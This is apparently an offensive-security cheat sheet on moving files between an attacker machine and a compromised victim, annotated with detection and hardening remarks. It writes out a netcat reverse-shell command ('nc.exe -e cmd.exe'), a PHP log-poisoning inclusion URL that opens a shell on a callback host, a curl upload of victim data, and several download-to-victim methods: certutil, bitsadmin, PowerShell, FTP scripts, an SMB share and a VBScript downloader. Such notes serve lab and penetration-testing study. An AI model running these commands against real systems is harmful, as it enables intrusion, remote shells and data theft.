File transfer

Linux

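# Web Server
# https://github.com/sc0tfree/updog
# updog serves a directory over HTTP and accepts uploads as well as downloads,
# so anyone who can reach the port can read from and write to that directory.
# Point it at a dedicated transfer directory rather than a home or loot folder.
pip3 install updog
# No arguments: serve the current working directory on the default port.
updog
# -d: serve a specific directory instead of the current one.
updog -d /another/directory
# -p: listen on a specific port.
updog -p 1234
# --password: require HTTP basic auth. The value is passed as an argument, so it
# is visible in shell history and the process list; use a throwaway value.
# Without --ssl the credential and the files cross the network in cleartext.
updog --password examplePassword123!
# --ssl: serve over HTTPS.
updog --ssl
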
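# Python web server
# SimpleHTTPServer is the Python 2 module name and does not exist on Python 3,
# where the same server is http.server. Both serve the current directory,
# unauthenticated and read-only, on every interface; start them from a
# dedicated directory. With http.server, --bind ADDRESS restricts the listener.
python -m SimpleHTTPServer 8080
python3 -m http.server 8080
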
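# FTP Server
# -n keeps twistd in the foreground; --root is the directory that is exposed.
# Port 21 is a privileged port, so this has to be started as root.
# FTP is cleartext: file contents and any credentials are readable on the wire.
twistd -n ftp -p 21 --root /path/
# In victim:
# curl -T uploads the local file out.txt to the FTP server.
curl -T out.txt ftp://10.10.15.229
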
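# TFTP Server
# TFTP (UDP 69) has no authentication and no encryption; everything under the
# served directory is readable by any host that can reach the port.
# In Kali
atftpd --daemon --port 69 /tftp
# In reverse Windows
# -i selects binary transfer mode. The tftp client is an optional Windows
# feature and is not installed by default on current versions.
tftp -i 10.11.1.111 GET nc.exe
nc.exe -e cmd.exe 10.11.1.111 4444
# Example:
# The next line is a URL from the original lab notes, not a shell command; its
# callback address (10.11.0.105) differs from the TFTP host used above.
# The include path is cut off with %00, which PHP stopped honouring in 5.3.4.
# In web-server logs the ../ sequence, the %00 and the nc.exe string in the
# query are the indicators to search for.
http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444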

Windows

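# Bitsadmin
# The published command had no host in the URL (http:///xyz.exe); the lab
# address used in the other examples on this page is filled in here.
# BITS transfers are recorded in the Microsoft-Windows-Bits-Client/Operational
# event log, which is where a defender looks for this job name and URL.
bitsadmin /transfer mydownloadjob /download /priority normal http://10.11.1.111/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe

# certutil
# -urlcache -split -f fetches the URL and writes it to the named file. A copy
# also stays in the user's CryptnetUrlCache directory, and this command line is
# a common endpoint-detection signature.
certutil.exe -urlcache -split -f "http://10.11.1.111/Powerless.bat" Powerless.bat

# Powershell
# WebClient.DownloadFile works on PowerShell 2.0; Invoke-WebRequest needs 3.0 or
# later. Both show up in script block logging (event ID 4104) when it is enabled.
(New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list")
invoke-webrequest -Uri http://10.10.14.19:9090/PowerUp.ps1 -OutFile powerup.ps1
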
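# FTP
# In reverse shell
# The Windows ftp client is interactive, so the session is written to a script
# file one line at a time and replayed with -s:. The first echo uses > to
# create the file; the rest append with >>.
echo open 10.11.1.111 > ftp.txt
# Anonymous login: the line after USER is sent as the password.
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
# bin switches to binary mode so executables are not corrupted in transit.
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt
# Execute
# -v hides server responses, -n disables auto-login (the script logs in itself),
# -s: names the command file. Delete ftp.txt afterwards; it holds the server
# address and login in cleartext.
ftp -v -n -s:ftp.txt
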
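# SMB Server
# Attack machine
# Arguments are the share name (Lab) and the local directory it exposes.
# The first form requires a username and password; the second has no
# authentication, so any host that can reach port 445 can use the share.
# NOTE(review): current impacket spells the options -username / -password and
# offers -smb2support; confirm the short forms against the installed version.
# Recent Windows builds refuse unauthenticated guest SMB sessions by default,
# so the authenticated form is usually the one that works.
python /usr/share/doc/python-impacket/examples/smbserver.py Lab "/root/labs/public/10.11.1.111" -u usuario -p pass
python /usr/share/doc/python3-impacket/examples/smbserver.py Lab "/root/htb/169-resolute/smb"

# Or SMB service
# http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
# The lines from [global] down to "force user" are the contents of smb.conf,
# not shell commands.
vim /etc/samba/smb.conf
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
# Unknown usernames are mapped to the guest account, i.e. anonymous access.
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ica]
path = /var/www/html/pub
# "writable = no" and "read only = yes" below set the same option twice.
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

# smb_path stands for the share directory (path = above).
# 777 is wider than a read-only guest share needs: the files are owned by
# nobody after the chown, so chmod -R a+rX smb_path is sufficient.
chmod -R 777 smb_path
chown -R nobody:nobody smb_path
service smbd restart
# Remove the [ica] share and restart smbd when the transfer is done; it stays
# anonymously readable for as long as the service runs.

# Victim machine with reverse shell
# Download: copy \\10.11.1.111\Lab\wce.exe .
# Upload: copy wtf.jpg \\10.11.1.111\Lab
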
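# VBScript
# In reverse shell
# Builds wget.vbs one line at a time: the first echo creates the file with >,
# every later one appends with >>. The script takes two arguments, the URL to
# fetch and the local file name to write.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
# The four HTTPREQUEST_PROXYSETTING_* constants are declared but not used by
# the rest of the script.
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
# Tries WinHTTP first, then the MSXML HTTP objects, as the HTTP client.
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
# Synchronous GET; the response body is kept as a byte array.
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
# The output file is created (overwriting any existing one) and the response
# is written to it one byte at a time.
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
# Execute
# Process-creation logs show this as cscript.exe running a .vbs file with a URL
# and a file name as arguments, followed by an outbound HTTP connection.
cscript wget.vbs http://10.11.1.111/file.exe file.exe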